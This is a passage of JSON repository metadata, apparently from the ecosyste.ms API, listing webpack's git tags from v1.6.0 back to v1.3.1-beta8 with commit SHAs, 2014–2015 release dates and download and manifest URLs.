ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack